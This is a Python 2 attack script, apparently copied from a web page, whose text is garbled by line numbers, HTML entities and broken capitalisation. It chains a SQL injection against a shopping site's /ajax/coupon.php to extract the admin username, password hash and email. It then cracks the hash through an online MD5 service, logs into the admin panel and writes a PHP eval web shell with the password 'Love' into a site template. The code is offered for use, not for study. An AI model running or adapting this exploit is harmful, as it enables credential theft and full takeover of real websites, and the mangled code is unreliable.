1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465 66676869707172737475767778798081828384858687888990 |
#!/usr/bin/env python#coding=utf-8 import sys;import re;import requests;import cookielib;import urllib; Import Urllib2; def Main (): url=sys.argv[1]; if Len ( SYS.ARGV) ==2: exploit (URL); pass; def Exploit (URL): print "Use of ..."; headers = {' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) gecko/20100101 firefox/23.0 '}; exp= ("/ajax/coupon.php?action=consume&secret =8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat (0x31,0x3a,username,0x3a,password,0x3a, EMAIL,0X3A), 8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23 ","/ AJAX/COUPON.PHP?ACTION=CONSUME&SECRET=8&ID=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6, Concat (0x31,0x3a,username,0x3a,password,0x3a,email,0x3a), 8,9,10,11,9999999999,13,14,15/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23 "); for I in range (2): htmlcontent=requests.get (Url+exp[i] , headers=headers). Text.encode ("Utf-8"); matching=re.compile (R "\:(\w+\:\w+) \: '); result=matching.findall (htmlcontent); if result: print u "use Complete" +result[0]+ ": @[email protected]#$%@"; md5crack (Result[0],url); pass;def Md5crack (Result,posturl): resul=result.split (': ') [1]+]: @[email protected]#$%@ " url=" http://www.cmd5.com/default.aspx "; headers = {' Referer '': ' http://www.cmd5.com/default.aspx ', ' content-type ': ' application/x-www-form-urlencoded ', ' Accept-language ': ' zh-cn,zh;q=0.8 ', ' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) gecko/20100101 firefox/23.0 ', ' Accept ': ' text/html,application/xhtml+xml,application/xml;q=0.9,image/ webp,*/*;q=0.8 ', ' Cookie ': ' asp.net_sessionid=duo0vysxepmc0mwdtvtlz033; cnzzdata3819543=cnzz_eid%3d1447456137-1406904769-%26ntime%3d1412593037 '}; data = Urllib.urlencode ({"__eventtarget": "Button1", "ctl00$contentplaceholder1$textboxinput": Resul, "ctl00$ Contentplaceholder1$inputhashtype ":" MD5 "," Ctl00$contentplaceholder1$button1 ":" Decryption "," ctl00$contentplaceholder1$ HiddenField1 ":" "," Ctl00$contentplaceholder1$hiddenfield2 ":" awumplta7raz0/ Sgwirtowc1erlhtceb7j0rhx44kq6gsja0jxkfj0gwmsuyev0h "}); req = Urllib2. Request (url,data,headers); htmlcontent= Urllib2.urlopen (req). Read (); if Re.findall (R ' Buy ', htmlcontent): &NBsp; print u "can buy"; Choice=raw_input ("Getshell y/n:". Decode ("Utf-8"). Encode ("GBK"). Upper (); if choice== ' Y ': Login (Posturl,result); pass; elif choice== ' N ': print u "Thank you for your use"; else: print u "cannot buy please modify the statement query next user try"; choice=raw_input ("Whether Getshell Y /n: ". Decode (' Utf-8 '). Encode (" GBK "). Upper (); if choice== ' Y ' ': login (Posturl,result); &nbSp; pass; elif Choice== ' N ': print u "Thank you for using";d EF login (url,result): user=result.split (': ') [0]; passwd=raw_input ("Please enter the password you cracked:". Decode (' Utf-8 '). Encode ("GBK"); geturl=url+ "/manage/login.php"; getur=url+ "/manage/index.php"; content=urllib2.urlopen (URL); res=content.getcode (); if res==200: posturl=url+ "/manage/system/template.php?id=about_job.html"; headers = {' Referer ': Getur, ' content-type ': ' application/x-www-form-urlencoded ', ' accept-language ': ' zh-cn,zh;q=0.8 ', ' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) gecko/20100101 firefox/23.0 ', ' Accept ': ' text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 ', ' Cookie ': ' Bdshare_firstime= 1408212168656; cnzzdata5760804=cnzz_eid%3d1828295659-1408725529-%26ntime%3d1408776317; iweb_shoppingcart=15f6e9c7a6mdewodaxmdexmdfkythlmdfmntvlzmo4mjkzydiym2f7jmdqb2dxjz9bwcqmexnvzhxidcyzw115; IWEB_SAFECODE=96AEED3E1CNDG4MDGXMDG1M2YXMDK9NMO2NGC7ZDFHYJLMMJS6PDA; CKFINDER_PATH=FILES%3A%2F%3A1; Jishigou_ra1gan_auth=97e5%2fuhqnoh1l3nsomkg2byzplbiuacpoxnvrvil2neon1esmpkjvqvekceu7e8yb0axeg0w5fvktbuco%2fel; JISHIGOU_RA1GAN_SID=2IX1XP; Ajstat_ok_times=1; cnzzdata1670348=cnzz_eid%3d166368451-1411712331-time%3d1412029938; Finder_showname=on; Finder_showsize=off; Finder_showtime=off; Finder_order=name; Finder_orderdesc=off; Finder_view=thumbs; Finder_displaysettings=off; ecs[visit_times]=16; Phpsessid=p6fld8b6dvthgcs86iu60ikhn5 '}; data =urllib.urlencode ( {"username": User, "password":p asswd, "commit": "Login"}); cj = Cookielib. Lwpcookiejar (); cookie_support = Urllib2. Httpcookieprocessor (CJ) opener = Urllib2.build_opener (cookie_ Support, Urllib2. HttpHandler); urllib2.install_opener (opener); req = Urllib2. Request (geturl,data,headers); urllib2.urlopen (req). read (); getshell (Url,posturl); else: print u "background address modified please find the real back office address and then operate";d EF Getshell (url,posturl): url=url+ "/about/job.php"; headers = {' Referer ':p osturl, ' content-type ': ' Application/x-www-form-urlencoded ', ' accept-language ': ' zh-cn,zh;q=0.8 ', ' user-agent ': ' mozilla/5.0 ( Windows NT 6.1; WOW64; rv:23.0) gecko/20100101 firefox/23.0 ', ' Accept ': ' Text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 ', ' Cookie ': ' Bdshare_firstime= 1408212168656; cnzzdata5760804=cnzz_eid%3d1828295659-1408725529-%26ntime%3d1408776317; iweb_shoppingcart=15f6e9c7a6mdewodaxmdexmdfkythlmdfmntvlzmo4mjkzydiym2f7jmdqb2dxjz9bwcqmexnvzhxidcyzw115; IWEB_SAFECODE=96AEED3E1CNDG4MDGXMDG1M2YXMDK9NMO2NGC7ZDFHYJLMMJS6PDA; CKFINDER_PATH=FILES%3A%2F%3A1; Jishigou_ra1gan_auth=97e5%2fuhqnoh1l3nsomkg2byzplbiuacpoxnvrvil2neon1esmpkjvqvekceu7e8yb0axeg0w5fvktbuco%2fel; JISHIGOU_RA1GAN_SID=2IX1XP; Ajstat_ok_times=1; cnzzdata1670348=cnzz_eid%3d166368451-1411712331-http%253a%252f%252flocalhost%252f%26ntime%3d1412029938; Finder_showname=on; Finder_showsize=off; Finder_showtime=off; Finder_order=name; Finder_orderdesc=off; Finder_view=thumbs; Finder_displaysettings=off; ecs[visit_times]=16; Phpsessid=p6fld8b6dvthgcs86iu60ikhn5 '}; data =urllib.urlencode ({"template_id": "About_ Job.html "," Content ":" <?php eval ($_post["Love"); Echo ' FuckWeb "?>", "Commit": "Save"}); #cj = Cookielib. Lwpcookiejar (); #cookie_support = Urllib2. Httpcookieprocessor (CJ); #opener = Urllib2.build_opener (Cookie_support, Urllib2. HttpHandler); #urllib2. Install_opener (opener); req=urllib2. Request (posturl,data,headers); urllib2.urlopen (req). read (); html =requests.get (URL). Text; if re.findall (R ' Fuck Web ', html): print U "Congratulations Getshell success \ n"; print u "Shell address:" +URL; print u "Password: Love"; else: print u "Getshell failure, please do not be discouraged, try again by hand, there may be a dog"; if __name__ = = ' __main__ ': main (); |